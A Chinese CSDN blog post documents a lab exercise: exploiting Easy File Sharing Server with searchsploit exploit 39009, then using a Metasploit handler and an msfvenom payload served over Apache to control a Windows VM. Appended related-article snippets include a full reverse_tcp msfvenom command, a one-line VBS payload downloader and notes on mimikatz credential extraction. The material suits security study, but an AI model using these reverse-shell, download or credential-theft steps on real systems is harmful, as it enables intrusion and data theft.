网络渗透测试复现任务

最新推荐文章于 2024-03-09 11:51:44 发布
最新推荐文章于 2024-03-09 11:51:44 发布
阅读量732 收藏
点赞数
文章标签: 测试工具 网络 wireshark python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73936732/article/details/127986829
版权

一、漏洞渗透测试

1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100

先使用nmap指令扫出靶机IP192.168.79.132,然后 nmap -sV -A -o easy-file.txt ip 扫描一下,发现虚拟机已经运行了 文件easy file sharing server

使用命令:searchsploit easy file sharing得到以下画面

3、利用该漏洞,使得靶机运行计算器。P116-119

选择 39009的脚本,再次使用命令:searchsploit -m 39009

然后利用python +文件位置 + IP + 8000端口

最后Windows虚拟机上面打开了一个计算器

二、Metasploit应用

1、生成主控端、被控端。

首先输入msfconsole启动Metasploit,使用handler作为主控端

然后使用use exploit/multi/handler

还有分别建立 payload  lhost  lport

2、获得靶机(Windows)控制权。

ls查看当前目录

cd进入某个路径

msfvenom –p生成payload.exe

找到payload.exe

cp其到www/html/0.exe

放到网上

service apache2 start打开服务

service apache2 status查看状态

run运行网站

3、下载靶机上任意一个文件。

靶机输入主控机ip + /0.exe下载端口0

运行0端口,在桌面下载233.txt.txt

主控机之前还处于靶机桌面路径,直接下载文件到默认root文件即可

早起的鸟儿不吃
关注
2024年网络安全比赛--综合渗透测试②(超详细)
Aluxian_的博客
11-26 2016
4.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,将中数据库的账号密码作为flag提交;1.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,将扫描开放的所有端口当作flag提交(例:21,22,23);6.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,将root权限唯一的文件内容作为flag提交;2.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,将初始界面中隐藏的信息作为 flag提交;✓ 服务器场景操作系统:未知(关闭链接)
Windows提权
赤赤三的博客
03-20 1113
Windows密码安全性测试: 本地管理员密码如何直接提取(能读取就直接读取,不能读取使用hash连接,实在不行就暴力破解): 直接通过mimikatz读取管理员密码: 使用Ophcrack破解系统Hash密码:https://ophcrack.sourceforge.io/tables.php 把这两个目录导入到kali自带工具里: 通过lazagne工具提取密码: 读取本地计算机所有密码 ...
完成一次渗透测试项目
bloodzer0
03-04 1626
背景:小B接到一个渗透测试任务,由于很久没有从乙方视角执行渗透测试的他决定先梳理一下自己的思路。 准备工作 第一个是渗透测试用例:对于技术人员来讲这是一个比较好的知识点沉淀的方式,不但有助于你在每一次的渗透测试中不遗漏掉某个点,并且还可以在团队内部进行共享方便提升团队内部成员的技能。 第二个是工具箱:工欲善其事必先利其器,有一个好的工具箱决定我们在渗透测试时的效率。一个好的工具箱应该包括,不同操作...
渗透测试流程
weixin_43280970的博客
06-22 232
渗透测试流程 渗透测试执行标准PTES (PTES)的先驱都是渗透测试行业的精英,有七个阶段组成 可以在任意环境中进行富有成功的渗透测试。 [http://www.pentest-standard.org/index.php/Main_Page] 7个阶段: 事前互动 情报搜集 威胁建模 漏洞分析 漏洞利用 深度利用 书面报告 主要特点优势 PTES的主要特性和优势如下 1、他是非常全面的渗透测试框架涵盖了绳渗透测试的技术方面和其他重要方面,如范围蔓延、报告、以及渗透人员保护自身的方法 2、他介绍了多数测试
小白入门黑客之渗透测试基本流程(全网最详,附工具)
最新发布
ytt0523_com的博客
03-09 1749
小白入门黑客之渗透测试基本流程(全网最详,附工具)
Easy File Sharing Web Server 6.9漏洞复现及生成主控端、被控端应用
yellowO的博客
12-23 579
一、漏洞渗透测试 1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用漏洞,使得靶机运行计算器。 二、Metasploit应用 1、生成主控端、被控端。 2、获得靶机(Windows)控制权。 3、下载靶机上任意一个文件。
网络渗透测试复现任务(1).pdf
11-07
网络渗透测试复现任务(1).pdf
网络渗透测试漏洞复现任务
m0_64229840的博客
11-21 533
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100。3、利用漏洞,使得靶机运行计算器。P116-119
复现任务——漏洞渗透测试及Metasploit应用
m0_74087834的博客
12-29 1166
一、漏洞渗透测试 1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用漏洞,使得靶机运行计算器。 见第六章PPT或PDF文档 二、Metasploit应用 1、生成主控端、被控端。 2、获得靶机(Windows)控制权。 3、下载靶机上任意一个文件。 见课本P127-133
复现网络渗透测试:从漏洞利用到Metasploit实战
"网络渗透测试复现任务主要涵盖了两个部分,一是漏洞渗透测试,二是Metasploit框架的应用。在漏洞渗透测试中,通过安装并利用Windows靶机上的EasyFileSharingServer服务漏洞来远程执行命令,例如开启计算器。而在...
网络渗透复现任务
dalungame的博客
12-27 446
以前旧版本的 Metasploit中提供了两条关于远程控制被控端程序的命令,其中msfpayload负责用来生成攻击载荷,msfencode负责对攻击载荷进行编码。如果我们让这个文件在某一台计算机(靶机)上执行的话,那么这台计算机就会立刻回连到攻击者IP上,但是我们这时还没有一个主控端,所以我们需要启动一个远程控制文件的主控端。“f,--format<format>指定输出格式(可以使用--help-formats来获取msf支持的输出格式列表)-o,--out<path>指定存储 payload的位置。
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2475
windows payload 反弹shell
Kali2虚拟机中工具Metasploit的简单应用
qq_55857040的博客
12-13 4381
实验环境 攻击机:Kali-Linux-2021.2-vmware-amd64 靶机:Win2003 旗舰版 实验过程 一、利用metasploit生成被控端 打开kali窗口,输入命令(注意空格符,复现过程惨痛代价) sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机的ip地址 lport=5000 -f exe -o /root/payload.exe 这样就是生成成功了 远程控制程序payload.exe(...
简单漏洞复现_网络渗透测试
Radiency的博客
11-23 1690
利用easy file sharing server服务漏洞;远程控制目标,生成主控端、被控端,获得靶机控制权
复现任务A
qq_42853814的博客
11-07 814
发现靶机的ip为192.168.124.138,不过这里我没有扫出靶机在80端口上执行着Easy File Sharing Web Server httpd服务。接下来我们利用溢出漏洞实现在靶机执行计算器程序,以/usr/share/exploitdb/exploits/windows/remote/39009.py为例。-o:存放payload.exe的路径,也可以把payload.exe放在root文件夹里,即/root/payload.exe。lhost=接收端的ip(你的kali的ip)。
内网payload下载及免杀文档制作
Amire0x的小乐园
11-30 738
payload下载及免杀文档制作 payload下载 vbs 脚本如下,注意要放到一行里 支持windows全系列,但对https不友好 echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile w
VMware Tools本地提权漏洞CVE-2022-31676分析与复现
Button12138的博客
01-31 1150
VMware Tools本地提权漏洞CVE-2022-31676分析与复现
漏洞复现】Weblogic CVE-2023-21839
zg_111的博客
03-23 6734
Weblogic CVE-2023-21839漏洞复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值